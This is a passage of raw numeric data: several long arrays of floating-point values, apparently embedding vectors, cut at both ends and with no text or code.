0728842,-0.13747121,0.011881647,0.0012996573,0.00013606621,0.011784808,-0.015262755,-0.012741614,0.018526694,0.010385979,-0.006065792,-0.027769836,-0.022395428,0.03807164,-0.015844416,-0.008289008,0.009607165,0.0123068625,0.011750244,-0.033427436,-0.012535405,0.016793415,-0.015346177,-0.005599458,-0.02614843,0.003512342,-0.01240074,0.026920123,-0.009918241,-0.011413525,0.01644594,0.02186951,-0.012213801,-0.018936094,-0.007954732,0.025789311,0.0092350235,-0.014172512,-0.038432375,-0.13804652,0.00013062397,0.007588118,-0.042210422,0.0081326105,-0.019816004,-0.010727624,0.012814833,0.0058769514,0.018297946,-0.0014125117,0.03901995,-0.006847949,-0.01032583,-0.021695055,0.0035992968,0.007520438,-0.005710274,0.0057973186,-0.0003775708,0.006865307,0.0025738648,-0.021548403,-0.017589258,-0.019224733,0.012700127,0.0011475056,0.032904577,0.004183442,-0.0075000445,-0.012549034,0.0061627813,-0.027493631,0.0028401313,-0.0058700284,-0.016665429,-0.015108149,0.007525387,-0.014989854,0.03610549,0.0064773466,-0.0023949738,-0.004868923,0.0065578395,0.0050849905,0.020244606,0.014569557,0.011616037,0.020439984,-0.0009230322,0.017776158,0.0036109602,-0.02527031,0.010192913,-0.016367551,0.00021588862,-0.010853663,-0.035815287,-0.020443877,-0.00025787574,-0.010010036,-0.004210615,-0.017985163,-0.0064377147,0.026382253,-0.0016351956,0.020699022,-0.017138122,-0.011971318,-0.0073902663,-0.008193209,0.010618114,0.013505488,-0.012764784,0.015033164,0.0024436426,0.0003534392,0.0035825514,0.030560408,-0.010666,0.014318977,-0.014168022,-0.0018321396,-0.039122686,0.012819889,-0.008094101,0.00071437383,-0.0007993287,0.003241062,0.0051218313,0.027559595,-0.021061433,0.0093453135,-0.0014355999,0.010341151,0.0051443037,0.021658031,0.0010224101,-0.021600692,0.011318395,0.009246399,-0.01725336,-0.025237568,0.010728783,-0.029521767,0.00043928868,-0.001375822,-0.014273506,-0.018344838,-0.0034276128,-0.0018700227,-0.015743082,0.02944825,-0.0071930187,-0.041025247,-0.018016065,0.0076250504,0.0078011914,0.012555013,-0.022010466,-0.030941138,0.00994836,0.007169511,0.0030889455,0.03939078,0.0145103205,-0.026018715,-0.0063736574,-0.0063472865,0.019713106,-0.026769327,0.013710875,-0.008052636,0.0049316953,-0.015057104,0.010699309,-0.01792125,0.014097433,-0.03308938,-0.009878615,0.00832266,0.019876922,0.0027049237,-0.0007700283,0.00010474299,-0.027874187,0.032724056,-0.009935866,0.015820684,0.005770373,-0.0023801224,0.028309463,-0.029993733,-0.02014276,0.02049073,0.05109029,0.0076243705,0.0036428436,0.015432249,0.010130915,0.005551215,0.0064528156,-0.01361247,-0.024777688,-0.025848307,-0.02857618,-0.003960597,-0.0001656363,0.022907978,-0.022994595,0.012204695,0.022340748,0.022454007,0.004745483,0.009535297,0.01683035,-0.009912376,0.004069511,0.020342207,0.019903617,0.016472962,0.011785457,0.017147502,-0.010265985,-0.008877439,0.005497662,-0.015861994,-0.0025812073,0.00079065503,0.01037407,-0.04182502,-0.022323202,-0.0043539456,0.0022012163,-0.002642691,0.0014251097,0.0078297,0.0023925274,-0.029176686,0.0020314904,-0.016954616,-0.011999993,-0.011098128,0.005725296,-0.0059501925,0.0007826447,0.015204094,-0.0046696193,-0.021934953,-0.0021909846,-0.016946737,0.0014882599,-0.003922951,-0.0065248087,-0.013761014,-0.0028539763,-0.021251107,-0.008212371,0.000074720316,-0.0060670073,0.0003007523,0.0049701133,-0.012257571,0.00008937253,0.019678162,-0.0047715446,-0.004109648,-0.023990702,0.0065294253,-0.0034563623,-0.018759165,-0.002937244,-0.004957193,-0.007789934,0.024247983,-0.0011190578,0.016242608,0.012459015,-0.010821173,0.009898569,-0.02827456,-0.028022524,0.025783453,-0.022949977,0.0035292716,0.013890655,-0.0014551631,0.021699041,-0.0058235056,0.0073993867,0.022381475,0.018417886,-0.0022421563,0.032318972,-0.016070351,0.021927344,0.026690219,-0.0014580012,-0.006575585,0.008101725,-0.020940682,-0.011283297,-0.0069737136,0.026169436,-0.0074636894,0.0052114073,-0.0077731838,0.01811311,-0.029626535,-0.0036855827,0.055411227,0.008104889,0.019061936,0.026626203,-0.0042815753,-0.02503815,0.0025047963,0.012263812,-0.00056311255,0.031180948,-0.016408576,0.003352552,0.014093264,-0.030839851,0.031508658,0.0064743618,0.026971143,0.017176505,0.0016455442,-0.008434324,0.011868946,0.023081338,0.02142186,0.012863093,0.0010503492,-0.015208784,-0.014585697,0.013959727,0.007908366,-0.016668977,0.007940241,0.0063958103,-0.0029042454,-0.028742759,0.013507423,-0.023526786,0.01998568,0.0028301287,0.0019376614,0.012430648,0.024160622,-0.015874237,0.0020428724,-0.01148018,-0.011314685,-0.005458515,0.03327414,-0.0012582383,-0.0059303027,-0.017809452,0.023289395,0.034020387,-0.006952329,0.02822758,0.0026365325,-0.006246355,-0.015490746,0.0076615694,-0.013498077,0.011005254,-0.0101189595,0.004658852,0.020333,-0.005011023,-0.0176932,0.0024006136,0.008406835,-0.0025908174,0.010919235,-0.0023272524,0.011644468,-0.0007073991,0.024607306,-0.01198245,-0.0014536419,0.0052744425,0.009926345,-0.010314342,-0.00768113,-0.025073836,-0.011796055,0.013705488,-0.016162015,0.013044768,0.006702417,-0.0044450774,0.013862013,-0.031262945,-0.013206005,0.0037600559,-0.021036845,0.0004963682,-0.013026259,-0.0031334965,-0.013991602,-0.015022786,0.0062611117,-0.011740255,0.0099030975,-0.0062474827,-0.014785478,-0.003601782,0.023743846,0.012006926,-0.031887792,-0.005742953,-0.0022219243,0.0108783385,0.015365912,0.0017285347,-0.00037071278,-0.03519962,0.06651835,-0.032057963,-0.009405742,-0.009300234,0.021844279,0.030172415,-0.01430576,0.0070445207,-0.014683886,-0.010949964,-0.007905012,-0.029405845,0.001585042,-0.0054638567,-0.030068925,-0.011511799,0.003761293,-0.0015417665,-0.011809195,0.001933297,0.017649274,-0.013963772,0.01725616,0.0051435577,-0.009520727,-0.053251952,-0.005260806,0.018978424,-0.031194726,0.012151848,0.008492655,-0.024369262,-0.03188518,-0.003080169,-0.015235978,-0.0075207343,0.0039424016,-0.00032669984,0.018542832,0.0025405106,0.03656734,0.0018377521,-0.010727395,-0.0017478387,0.013480652,-0.015100174,-0.012938704,0.0036531624,-0.028471312,0.003112773,-0.0076987497,0.013847268,0.020908827,0.015188662,-0.022297569,0.012099645,0.0049141617,0.000496584,-0.0006413252,0.014126757,0.030944012,-0.014079763,-0.037843447,-0.02556771,0.0179627,0.010659635,-0.0074925763,-0.034822293,-0.005513789,-0.007181343,-0.01683654,0.010506422,0.0026795303,0.010670176,0.011735577,0.004938862,0.013781762,-0.005079032,-0.0043115937,0.015240469,0.010414495,0.007384416,-0.0052490043,-0.012685924,0.0045350804,0.0006180511,0.009573351,0.03319003,0.0025665294,0.02765964,0.046525095,-0.009248291,0.014691137,-0.021079581,-0.0054791085,0.009582087,-0.008976514,-0.019710133,0.012644362,-0.03221137,-0.025932461,-0.0014455173,-0.005203438,0.0077831536,-0.021327486,0.0029935888,-0.11410516,0.015658218,-0.017938001,-0.01250222,-0.0053604543,-0.01807093,0.0005046608,0.024572501,0.009775382,-0.027195737,0.00073140766,0.027670901,0.00439653,-0.01058483,-0.00986041,-0.001313389,-0.021495922,-0.0021643273,-0.016302807,0.011859259,0.00859799,-0.025139745,-0.0045966804,-0.002918167,0.019099811,-0.008488539,0.0004957575,0.012481933,0.0070106857,0.006891039,-0.002788533,0.0038739666,0.00667559,0.009476056,0.007627815,0.009980988,-0.0064338236,0.006607964,0.001924351,0.009147468,-0.003805991,-0.014067556,0.0032347804,-0.0020369682,0.0058828387,-0.0044664294,0.0008163355,0.014151272,0.0231467,0.02598994,-0.017150003,-0.01285295,0.015228605,-0.015558696,-0.00006988414,-0.01918971,0.00030782865,-0.007042441,0.014908283,0.010066601,-0.0114569655,-0.013119374,-0.0054787844,-0.0032730855,0.007353536,0.009171136,0.0019171129,-0.00055033667,-0.021082222,0.00080821395,-0.018432023,0.012702483,-0.00531778,-0.0014715458,-0.0045157247,0.005714434,0.01371606,-0.013140238,-0.016853921,0.026675714,-0.028612917,0.0070228884,-0.0020895463,0.031393457,0.0076975757,-0.027581032,0.0034865057,0.012561762,-0.0078662485,0.010641772,-0.013453207,0.009450811,0.002616148,-0.016168648,-0.004507041,0.012383307,-0.0046988507,0.009425442,-0.0031783106,-0.007048688,0.00051848136,0.006191352,-0.014915475,-0.023349134,-0.10105004,-0.02038133,0.011159629,-0.0030090436,-0.0023337768,-0.006710522,0.020224217,0.002731333,0.0314086,-0.001232268,-0.017565126,0.008132255,-0.017300542,-0.00062810094,-0.014327707,-0.005058963,-0.030001253,0.014563475,-0.010733259,-0.002498641,-0.011948274,-0.025390727,0.007929385,0.01647764,0.0038691594,0.004589619,0.019137582,0.04255289,0.015208834,-0.004804464,0.0041819625,0.021389592,-0.0039127497,-0.0045323432,-0.035521667,-0.01026607,0.01869127,0.0024025417,-0.0023186454,0.03053772,0.016605115,-0.005327376,0.018325347,0.016436063,-0.0063538775,-0.005787324,-0.009557104,0.019447392,-0.007987365,-0.0014928611,0.012967376,0.0042011384,-0.0067802696,0.0011834849,-0.0076380167,-0.015916195,-0.013560764,0.009167648,0.018353127,0.0055189217,0.0054482864,0.011037518,0.0013147763,0.005609437,0.010648374,0.028648665,-0.008727499,0.016637025,-0.01602128,0.0003638386,-0.0051277573,0.014069953,0.008636049,-0.018857004,0.024759287,0.012862577,0.020804841,0.019295467,0.0029138988,-0.0034221893,-0.0006701013,-0.04068061,-0.003938225,0.009647189,-0.039499775,0.013522511,0.0009705532,-0.002836833,-0.013157639,0.007382867,0.019947348,0.02003192,-0.0072264173,0.0394614,0.009832281,0.016167816,0.053609807,-0.004339328,-0.0057809553,-0.025879575,-0.000115090304,0.0075464235,-0.017669147,0.0053017503,-0.026019143,0.020618334,0.0096840765,0.0007781685,-0.0047744275,-0.011241992,-0.0012822087,0.05838521,-0.0283326,0.0036111928,0.017846307,-0.018315393,-0.008645347,-0.002202627,-0.004478707,0.002774296,0.008297905,0.0035825733,0.009796932,-0.023608254,0.0010574147,-0.0025476082,-0.0214874,0.026111986,0.009269699,-0.03282686,-0.0016461739,0.020754348,0.009452123,-0.014858386,-0.0016032575,0.01786453,-0.019238397,-0.0052586845,0.021979427,0.0074482327,0.011118307,-0.013072172,0.013221851,-0.0037247331,0.0016075085,0.021793619,-0.0016009737,0.009086273,-0.023109939,0.0061147274,-0.003426089,-0.018056944,0.030332597,0.03952937,0.004746991,0.003265337,-0.013931034,0.017004322,-0.009017612,0.014927967,-0.017136294,0.031484112,0.036814094,-0.005618054,-0.0069975536,-0.020596737,-0.0029432976,0.0010536412,-0.007566184,0.008923617,0.0018306106,-0.003752353,0.022491332,-0.046848435,0.0073164036,0.010289306,0.016374053,0.0037005076,0.032561995,0.029881174,-0.022817947,0.0008664193,-0.008726289,-0.009977463,0.01526253,0.017809737,0.0005764291,-0.003643445,-0.017851204,-0.011419208,0.039986912,-0.0023522011,-0.01714823,-0.024659632,0.0032154804,-0.0049188365,0.0032479241,0.012157938,0.019764276,-0.005131409,-0.030605644,0.00055240263,0.006425128,-0.018391326,0.0018345623,0.0029022733,0.004024694,0.037817378,0.024708971,-0.012026978,-0.011886168,0.00064658624,-0.010717479,-0.010262821,0.012420086,-0.0040468457,0.0004297224,-0.02667884,0.0073796175,0.013266303,-0.009444648,-0.032147966,0.003971824,-0.0026246344,-0.016877223,0.023928652,0.022801643,0.026852986,-0.024779353,-0.024838932,-0.001170015,0.0069164988,-0.028827932,-0.004623371,0.004096475,0.0033210646,0.013623991,0.0010614018,0.0143875,0.0059868027,0.036032796,0.019594224,0.017651029,0.030766089,0.016055265,0.0039088805,0.005152701,-0.004673828,0.01244447,0.03549584,0.0012832138,-0.0009583182,0.0009340388,-0.011883186,-0.010586118,-0.0046725534,0.019868273,0.012335209,0.0020353056,0.0057336157,-0.027745398,0.0017664629,-0.012553848,-0.021266209,0.013299503,-0.013295083,-0.003969426,-0.025964012,-0.00013125483,0.00095357304,0.027600663,0.013299968,-0.008850034,0.019013997,-0.008641446,-0.009586331,0.0007804186,0.006270163,0.014167474,-0.0057149194,0.0040527508,-0.010161385,-0.021023382,0.022646632,0.0068872524,0.0031363987,-0.008074915,0.020942455,-0.02899738,-0.0033974308,0.0102996165,-0.013614461,0.009482085,0.0000994412,-0.003230592,-0.0013562037,0.031346608,-0.0064985496,0.016838044,0.008151817,0.014696574,-0.004183018,-0.005901487,-0.01640644,0.013468941,-0.018109567,-0.0056874417,0.01772847,0.0072295046,-0.019362953,-0.020335717,0.024075165,-0.008791769,0.006459643,0.017415859,-0.0071061607,0.0076751276,0.0050921836,-0.045866158,-0.011254052,0.008036142,-0.011767577,0.021669332,-0.0017896781,0.0011816234,0.0010715432,0.002631789,0.047374923,-0.006728721,-0.007427036,0.02272033,-0.03726977,-0.007919627,-0.009889923,0.02374212,-0.008186841,0.025352478,0.040302917,-0.022989504,0.015940527,0.0021811172,-0.0118896095,0.007755745,-0.0018300542,0.0012257554,0.018519208,0.000024420344,0.0037136034,0.012289598,-0.0029233205,-0.0033088794,0.010798919,-0.0018604578,0.0011944085,-0.014181879,0.024715029,-0.037299126,-0.001440137,0.017091386,0.017187448,-0.005587637,0.004016857,-0.0016894519,-0.022808813,0.018129626,-0.0034022557,-0.014462096,0.0078363,-0.03421695,-0.0078398585,-0.016258668,0.021360034,-0.028677016,-0.013040157,0.0007713007,-0.09099923,0.0012029448,0.014008211,0.006777431,0.043443047,0.008367734,-0.008780056,0.01003929,-0.005577715,0.017776337,-0.005449694,-0.008385105,-0.016322164,0.015803913,0.041990332,-0.0074106106,-0.008722135,0.017367532,0.006304551,-0.027397104,0.0032936868,0.011328474,-0.018892597,-0.0070823245,0.015546255,-0.016572807,-0.006305784,-0.02103689,-0.0072638793,0.014450084,-0.0074371733,-0.012645208,-0.0013544785,-0.011954015,0.002436933,-0.005412104,-0.011052276,0.032903627,-0.027779376,-0.03836632,-0.0000031227953,0.012852601,-0.00043311677,-0.008605819,-0.020751566,0.009174723,-0.02429231,-0.010193072,-0.014846649,-0.0056614126,-0.014440746,-0.005460868,-0.02289797,0.0333352,0.0026026857,0.01871778,0.0037949786,-0.0045117103,0.031519793,0.0040579285,-0.021047136,-0.0072475886,0.00083753525,0.0101514,-0.0009869756,0.012342243,0.0069771544,0.016698185,-0.004754356,0.003057132,0.014670297,-0.03155572,-0.017092716,-0.015293457,-0.0012970277,0.0014342876,0.013292698,-0.013909153,-0.011123284,0.0072201006,0.042368136,-0.0027474642,0.02676812,0.003921942,0.009613567,0.007091109,-0.0045562116,-0.00090984424,0.0314961,-0.0056108097,-0.01825478,-0.0024631135,0.03145182,-0.00071582175,0.019779986,-0.0018471353,-0.011028889,0.0084872125,-0.004690068,0.0112060355,0.0069380915,-0.005351515,0.0035153467,-0.021553172,-0.0331491,0.0069773085,0.0034791194,0.0055688135,-0.0028551929,-0.005875955,-0.016006192,0.023465076,0.009562636,0.05089844,0.003620008,0.008843331,-0.004070249,0.008372181,-0.015486022,-0.022177204,-0.0127086975,-0.0031034376,-0.0065041445,0.044112366,0.02343391,-0.0037014976,0.024516119,0.006683129,-0.025415348,-0.0016185248,-0.0084325755,0.031696055,0.006394692,0.018973636,-0.009591166,-0.010320027,-0.018270427,0.015571579,0.0040981486,0.01737785,0.016177716,-0.024959289,-0.008526209,-0.013000035,-0.02328025,0.020644194,0.0010062637,-0.005138217,0.012076816,-0.021104537,0.0026024098,-0.0024987315,-0.012499686,0.0049861404,0.008777802,0.006252293,0.016947147,0.0044596335,-0.01783798,-0.006601264,-0.012304527,0.010745164,0.018124692,-0.010400235,-0.032174718,0.0019332898,0.00026797163,-0.010057309,-0.019108249,0.006682176,-0.010740271,-0.01920135,0.005939658,-0.006508376,-0.001274738,-0.0064690616,0.026935011,0.034027323,-0.011764734,0.004896984,-0.021961462,0.010810959,-0.0016054392,-0.017649107,-0.004307077,-0.012689391,-0.0025762913,-0.0133073,0.0011400989,-0.010882308,-0.004013649,-0.006534244,-0.006294833,-0.01795004,-0.0072826827,-0.021145556,-0.0022302428,0.0010576918,0.0023194044,-0.00095545396,-0.016313538,0.012631964,-0.025311682,0.026157483,0.034366056,0.011144912,-0.0068012117,0.017155003,-0.0011068399,0.011262928,-0.006463643,0.0043513714,0.0215305,0.10276075,0.010848324,0.0031848454,0.00074019417,0.0072667026,0.0023796181,0.02139285,0.0016613947,0.006282811,0.004042494,0.029273484,-0.016777268,0.01754131,-0.0064268815,-0.0043365774,0.01946575,0.00937295,-0.015410176,0.017525822,0.0062456685,0.018040575,-0.028717795,-0.016476084,-0.043018624,-0.0128750475,-0.04942537,0.021552589,0.012471009,-0.004431692,0.0198526,0.014030448,-0.019926503,0.006927062,0.009799296,-0.024300775,0.008599023,0.011851365,-0.009209699,0.0020911293,-0.008966341,0.0069242255,-0.0022208046,-0.0070961276,-0.013687565,-0.010608701,-0.020324385,-0.0038179462,-0.0056508873,-0.009839469,-0.023417145,-0.0014391347,-0.0069922963,-0.0027102283,-0.000015951104,0.020462822,-0.013457471,0.00708806,0.016777815,-0.012680263,-0.01259379,0.017221896,0.007697449,0.007231329,-0.006454797,0.014354334,-0.013541652,-0.008197951,-0.0056138006,-0.012139968,-0.010735344,0.0066835457,-0.01478725,-0.0022606894,-0.00049253437,-0.007428403,0.02075442,-0.010291007,0.008453098,-0.009823108,0.008918577,0.0038450959,-0.00684628,0.0038838952,0.0071008615,0.0007798345,0.009908111,-0.014576283,0.0076923952,-0.0029517508,-0.0038823597,-0.0051175933,0.020179607,0.02458377,0.025681974,-0.0062629324,-0.007363983,0.014457012,0.0006630117,-0.009643292,-0.0073799943,-0.015282086,-0.014655586,-0.018151945,0.01965807,0.0049335514,-0.0053713974,0.00065641943,0.008375353,0.00095696724,0.003936412,-0.0053723697,0.026922273,0.0036174455,0.011566702,-0.0016267771,0.03343008,-0.021060623,-0.007730817,0.02401092,-0.030412013,-0.014262568,0.015436815,0.00065751735,0.04443297,-0.001405899,-0.0010395693,-0.009904479,-0.007963216,-0.009412853,0.00020689938,0.02090165,-0.040613715,0.003969523,0.01767731,-0.0036226388,0.0014289226,0.03289355,-0.009294691,0.012377542,0.0028919233,0.006815882,-0.018582169,-0.017164512,-0.0054691364,-0.008089717,-0.014893193,0.032116212,-0.009698583,0.022995375,-0.014211248,0.0069931196,0.012099881,-0.02284125,0.00007032914,-0.021838339,-0.016566781,-0.0063387332,0.010155593,-0.008079045,-0.015650138,0.0055471016,-0.011398889,0.005400232,-0.05393037,0.02011021,0.020041522,0.003231148,0.0072875246,-0.013420906,-0.0036785845,-0.013144942,-0.004761694,-0.00760043,-0.0043098475,-0.01491997,0.01660879,0.0075895353,0.018577076,-0.026173221,0.004824091,0.013440444,-0.0004743969,0.00043450957,-0.015671624,0.018176138,-0.013704297,0.02020463,-0.0034681743,-0.021527782,0.027887003,0.013891603,0.003850609,-0.0070278705,0.000033569177,-0.018226428,0.009023585,-0.04658931,0.04783555,-0.026345894,-0.039681684,0.0014477365,0.009910966,0.0150255645,-0.021012215,0.0030528856,0.0017917266,-0.0021233116,-0.01541557,0.007996085,-0.00295555,0.005462364,0.008007486,0.0007093111,-0.03136508,0.0007524817,-0.0020690213,-0.0038598625,-0.03279451,-0.0041362927,-0.0030442313,0.004040545,0.017949106,-0.0021759288,-0.0018309421,0.008525075,-0.0063693207,-0.016241826,-0.00005311169,0.0108386045,-0.026538061,-0.025765494,0.012098901,0.0066543175,-0.009458192,-0.012650465,-0.0011479934,0.010983365,0.016448598,0.0028769767,0.00998263,-0.0046446794,-0.0011553473,0.013522372,-0.0064983345,-0.012041372,0.007909631,-0.017260645,-0.0135091515,0.0042834664,-0.0013641011,-0.029848484,-0.01697375,0.0006226943,-0.010869318,-0.021405302,-0.0056430115,0.0009287981,0.010914269,0.006038812,-0.02331709,0.0056030722,0.02080579,-0.010936037,0.01514202,-0.006111611,-0.01853191,0.0074628848,-0.035195615,-0.0015748297,0.023513304,-0.0109739825,0.01695817,-0.009225155,0.027937189,0.0024559202,0.00934014,0.0003424679,-0.006595036,-0.015435075,0.0009767871,0.018348929,-0.014051442,-0.0018022496,-0.028926222,-0.0009120869,-0.011794743,-0.01445205,0.0046944185,0.07317147,-0.057473887,-0.008559133,0.008827571,0.0029873468,-0.017076762,0.018335996,0.014168413,-0.021036582,-0.021436188,-0.0027878748,-0.009166223,-0.003344913,-0.027807547,-0.0053637293,0.010493995,-0.012195645,-0.013997791,0.005642844,-0.006758236,-0.012716391,0.007883237,0.00078026764,0.0008783045,-0.0038684928,-0.015415429,-0.0040626065,-0.024753608,0.008592317,0.00082420063,0.012726647,0.018775063,0.010706769,-0.030456876,-0.004746744,0.015519512,-0.00019598493,0.01449379,0.0053210557,-0.043046135,-0.020698914,-0.01167064,-0.0092735095,0.0111288205,0.009411749,-0.005200884,-0.015326196,0.007698674,-0.0053374856,0.11687032,-0.011382109,0.0003063623,0.014155039,-0.0016684693,-0.0051879175,0.010604951,0.020806039,0.015496039,0.026511408,0.024671972,-0.00047340244,0.007950134,0.032642584,-0.006324235,0.012561968,0.009926924,0.13112518,-0.016537404,0.04046884,0.0114752,0.0066502355,0.000119326214,0.018791141,0.00007488054,-0.08710918,-0.00716347,-0.040320836,-0.00942911,0.0055881846,-0.024914905,0.011743007,0.00011370602,0.020176353,0.001701145,0.0007152759,0.0075927135,-0.0010935521,-0.028558796,-0.0052263816,0.023500312,0.0023865313,-0.00672365,0.0059839366,-0.026865937,0.0042466316,-0.03051767,0.015354369,-0.02019077,0.029705584,0.013970685,-0.0075572394,0.03271758,0.0015661805,0.0008060736,0.0031631542,0.0036990005,-0.0068385145,-0.03624644,0.025467789,-0.0047423164,0.012285823,-0.007811116,0.027644137,-0.0050961706,-0.0023618054,-0.013660642,0.0022665623,0.0040976284,0.019386027,0.033231594,0.014949024,-0.0195842,-0.015104038,0.04308938,-0.002910283,-0.0077579166,0.007049449,0.016876807,-0.0032954551,0.044764813,0.010338782,-0.009615699,0.003444478,0.0149654895,0.014823298,0.0012157902,0.015931545,0.0084876865,-0.009399018,-0.00501568,0.010848438,-0.014050505,0.015318082,0.016198516,0.02269848,-0.009177907,-0.0041824197,0.018615674,-0.010331382,-0.009053896,0.038531836,0.0061165304,-0.01603421,-0.010312547,0.009895688,-0.018996216,-0.032601736,0.009190779,0.0024212361,0.00803276,0.014737458,-0.016040726,0.017264728,-0.011792545,-0.01523803,0.0021780992,0.00089761434,-0.028118186,0.00726563,0.006970639,0.00074775977,0.0020052753,0.006003358,-0.015784167,-0.008227937,0.0054446473,0.02521806,-0.0050259433,-0.0026225152,-0.025780153,0.0015687206,0.02041787,0.058093768,0.006618768,-0.00629868,0.0076624556,-0.04057235,-0.023543533,-0.006226671,-0.0026096923,0.0011553157,0.018517831,0.011020313,-0.015529074,-0.01369437,0.0034693903,0.0045337374],[-0.011439015,0.0010156118,-0.011896706,-0.01970934,0.0027350832,-0.03349496,-0.011490709,0.015529986,-0.010300357,-0.01704718,-0.02786804,0.02260682,-0.011775969,-0.007563488,-0.021999082,0.0006778749,0.022249488,-0.010370944,-0.0027499227,0.0037669041,0.008461656,-0.005944025,0.020995624,0.0020465879,-0.00047628745,0.00443377,0.002984034,-0.013631091,-0.0063784583,0.009657342,-0.011103093,0.025397003,0.017609676,0.0065679937,0.017783875,0.005674282,-0.015791932,-0.014744349,0.008746419,-0.013918215,-0.0029411241,0.0072123804,-0.012037038,0.012791493,-0.0106064845,0.003967044,-0.016893221,-0.01318404,-0.027655037,-0.0040756837,0.008774723,0.00041377742,-0.022151308,0.033917848,-0.019154085,0.024515538,-0.006613679,-0.030499848,-0.0019202445,0.0068254992,-0.005881886,-0.020770987,0.002990472,-0.019918993,0.04156477,0.0012379872,0.0026053563,-0.014249452,0.0015949807,-0.022455603,-0.009852126,-0.014461256,-0.0046600755,-0.0006157375,0.0073177726,0.023004869,0.008955982,-0.022152819,-0.024056422,0.015857575,0.0059535317,-0.00027739676,0.007828315,-0.01896616,0.028527964,-0.0044428683,-0.008983229,0.00454758,-0.0033783698,-0.028838905,-0.004839783,0.021845197,0.0025711784,0.006600014,-0.01465521,0.018658163,0.0047269715,0.0020316865,-0.019854685,0.01327175,-0.019525705,-0.025470693,-0.032061942,0.013073047,0.004119732,-0.016454859,0.002552368,-0.026581768,-0.008470093,-0.021917285,0.013752178,-0.018632963,0.0026888181,0.017337244,0.015280874,-0.028161306,-0.010092648,0.0054724393,0.004981602,0.008274058,0.0039435066,0.025984624,0.015354171,0.008146756,-0.007657011,0.0023286373,-0.0009831764,0.015422168,0.008943382,-0.00018862436,0.00535271,0.011904325,-0.011680078,-0.013363197,-0.013684082,-0.0061176154,0.007108186,-0.013657325,0.00068087527,-0.009535634,0.020844242,-0.0079163555,0.0012418525,0.0067943726,0.022908235,0.0053596525,-0.006176047,0.0152425645,0.01615871,-0.006243924,0.009311197,0.0043068705,-0.021176467,-0.020736044,-0.0019243516,0.022559885,0.002440862,-0.026860856,-0.030180553,0.008024726,-0.014225577,0.008527978,0.0060582873,-0.014975192,-0.0050358037,-0.053055976,0.01759094,-0.024775123,-0.014595314,0.01246306,0.012551123,0.014464199,0.017040553,-0.0011909872,0.008355923,0.011723101,-0.0012240367,-0.017279668,-0.0070621422,-0.0003384394,0.027079646,0.018034136,-0.0076835044,0.0075638704,0.013070308,0.015796382,0.021158636,0.0023069282,-0.021387225,0.0051418147,0.0038182077,-0.02232546,0.007162112,0.0032978365,-0.026964866,-0.02413806,-0.009931257,0.09142316,0.019040352,-0.0033222146,-0.033860434,-0.009853848,-0.0055953558,-0.04350219,-0.007960802,-0.0167934,0.0032357436,-0.027615028,0.009585434,0.0002260533,0.016041972,0.006731146,-0.015911097,0.0044647115,0.0041833734,-0.040797576,0.01692766,0.023972478,0.0011663914,0.0013221368,-0.012491929,0.0074424823,0.008790821,-0.02431827,0.0016216635,-0.028351288,-0.0031122053,0.0016948357,-0.00037395404,-0.024725944,0.016176835,0.005626767,-0.02414005,-0.006362315,0.023433156,-0.00312275,0.008510251,-0.017259682,0.0019186886,0.0051934263,-0.012508281,0.009588099,0.036018927,0.039602492,-0.015496212,0.00038831946,-0.0025243645,0.006812607,-0.016675876,0.026754111,0.015575846,-0.023493947,0.026237972,0.029304326,0.01353495,-0.02648741,-0.008827801,-0.010375954,0.0025142354,-0.007906035,0.021557707,0.015673744,-0.0047788797,0.03066112,0.03334482,0.000751801,0.009956867,-0.028539548,0.000890237,-0.009904211,-0.016309341,0.012384645,-0.007136563,-0.0052736173,-0.0102572255,-0.0033254875,0.009109187,0.0028487686,0.0049623437,0.0007338879,-0.004391201,0.013476227,0.0070130583,-0.023806153,-0.00089853915,0.01059525,-0.021484712,0.01710261,0.027715486,-0.019644527,0.001997099,-0.0013337668,0.023000594,0.018209778,-0.006611921,-0.014611239,-0.005594439,0.031563666,0.0020607687,-0.03382031,0.013623492,-0.011638488,0.021662144,-0.009576019,-0.015358547,0.007705352,-0.012371432,0.040485904,-0.03463614,0.02505995,-0.044234406,-0.007918402,-0.030549193,-0.00913827,-0.0016677328,-0.0052371984,0.00620145,-0.030669285,-0.014036555,0.017282888,0.023928773,-0.023850149,-0.00010461649,-0.035167202,-0.0039521046,0.0034114865,-0.013760028,-0.008150884,0.009312157,0.018263375,0.002561065,0.014489169,0.021824868,0.018258102,-0.0108954245,0.011776235,-0.0073056086,0.009881891,0.012123594,0.019870438,-0.01332561,0.011215041,-0.009302227,0.004758655,-0.002562473,-0.0069529624,-0.0024111136,0.012116274,0.022849692,0.013302957,0.021631924,-0.0068750065,0.00074263016,-0.015421656,-0.0004888503,-0.0042293845,-0.0077543156,-0.013144125,-0.00921408,-0.020705838,0.023410564,-0.010604916,-0.01799027,0.0034174721,0.052867126,0.0047019986,-0.0065278416,0.007050392,-0.02371854,0.006173233,0.031479258,0.019215392,-0.0025566698,0.0014138474,-0.009091183,-0.012533466,0.0050886157,0.016483959,-0.026818095,0.020447109,-0.02264497,-0.0072907717,-0.020446673,-0.007040684,0.010141056,-0.01523012,-0.0022356957,0.030074498,0.0046573817,0.02465845,0.0013414508,0.004037392,0.011229192,-0.034122344,-0.009965605,0.008216938,0.01201825,0.0150885945,-0.03524141,0.023084307,0.016420653,0.012677679,-0.013314244,-0.015648939,-0.0072790287,0.013925787,0.0032850616,-0.032767206,0.0066780313,0.03727624,0.0046558017,-0.020887153,-0.010891941,0.009519132,-0.0011617983,0.029396912,-0.020665336,0.009019145,-0.0067395824,0.024739442,0.029944886,-0.049435638,0.03852783,0.029013984,0.019053282,0.02115605,-0.005388449,0.00008327504,0.007569344,0.036614254,-0.008413584,-0.01332871,-0.011388129,0.005911198,0.006625777,0.02105226,-0.0071244542,0.008690811,-0.016679114,0.018037163,0.01167052,0.011424119,0.0133816665,0.019241225,0.00065375847,0.023910273,0.014990073,-0.012116505,-0.0055910503,-0.0063397116,0.012196524,-0.025345119,0.0112273265,-0.016751077,-0.002942623,0.0065597296,0.006857306,0.004310648,0.019290548,0.011307461,0.020602327,0.0202143,0.0036143805,0.013677304,0.0056549544,-0.007082428,0.0059347665,-0.00718589,-0.0028605447,0.007247246,0.0030181003,0.00102044,0.003985264,0.043524604,-0.007928765,0.00471074,0.007504393,-0.020890227,-0.013301251,-0.02188386,-0.00975786,-0.015931888,-0.0060754516,0.008402805,0.017532319,0.010023753,0.009584867,0.017313514,-0.019247111,0.0091241235,-0.0029816043,-0.025296308,0.021862196,0.031790208,0.000016416747,0.029524937,0.010437374,-0.036641095,0.016387818,-0.0072870567,-0.020930829,-0.039763138,0.040049862,0.012432164,0.014464377,0.015048792,0.026822055,-0.011396825,-0.